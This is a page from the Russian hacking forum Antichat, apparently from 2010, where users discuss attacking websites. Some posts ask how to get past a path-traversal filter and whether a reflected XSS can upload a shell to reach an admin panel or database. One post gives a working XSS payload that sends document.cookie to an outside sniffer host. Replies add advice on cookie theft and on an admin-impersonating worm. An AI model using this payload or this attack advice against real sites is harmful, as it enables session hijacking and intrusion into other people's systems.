ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11081  
Старый 04.01.2010, 23:37
Аватар для ZavuloN
ZavuloN
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме:
29882

Репутация: 0
По умолчанию

Цитата:
Сообщение от Strilo4ka  
а mysqli розширение не??? я не увверен но просто когда то что то читал в книге кажеться библия пользователя пхп мускуль ...
Ну вообще есть такие запросы, но при непосредственной работе с базой.
Насколько я знаю из php такое нельзя выполнить.
 
Ответить с цитированием

  #11082  
Старый 05.01.2010, 00:10
Аватар для ZavuloN
ZavuloN
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме:
29882

Репутация: 0
По умолчанию

Цитата:
Сообщение от Strilo4ka  
почитай о mysqli тут тока его редко используют а используют тогда если много запросов тупят роботу, то переписуют одним используя multi_query.
Да, действительно. Но нам это к сожалению врядли поможет
 
Ответить с цитированием

  #11083  
Старый 05.01.2010, 00:13
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Как поднятся на уровень директории выше, если скрипт обрезает ".."?
 
Ответить с цитированием

  #11084  
Старый 05.01.2010, 00:18
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от mailbrush  
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
сомневаюсь в возможности
 
Ответить с цитированием

  #11085  
Старый 05.01.2010, 00:38
Аватар для Root-access
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Цитата:
Сообщение от mailbrush  
Как поднятся на уровень директории выше, если скрипт обрезает ".."?

Обрезается только ".." или "." тоже?
 
Ответить с цитированием

  #11086  
Старый 05.01.2010, 02:52
Аватар для Raul Duke
Raul Duke
Новичок
Регистрация: 21.01.2009
Сообщений: 6
Провел на форуме:
62064

Репутация: 0
По умолчанию

Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
Цитата:
<script > alert("XSS") < /script>
Немного помудрив смог выполнить на нем хтмл код
Цитата:
<img src=http://a3.bing.com/reference/assets/orig/128px/Noscriptlogo.png>
т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд?

Последний раз редактировалось Raul Duke; 05.01.2010 в 02:54..
 
Ответить с цитированием

  #11087  
Старый 05.01.2010, 02:55
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Raul Duke  
Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется

Немного помудрив смог выполнить на нем хтмл код

т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд.
Если зальешь шелл через XSS - выложи видео, лол ок.
*не надо мне тут говорить пров аши особые условия
Только куки

*скажу сам про особые условия - если через админку льется шелл, то можно написать червячка, который от лица админа сам зальет шелл. Но это много ипоты.
 
Ответить с цитированием

  #11088  
Старый 05.01.2010, 03:01
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Не только куки еще код скриптов можно смотреть, кузя писал!!!
дай ссылку плиз на это чудо
 
Ответить с цитированием

  #11089  
Старый 05.01.2010, 06:10
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз
 
Ответить с цитированием

  #11090  
Старый 05.01.2010, 06:25
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ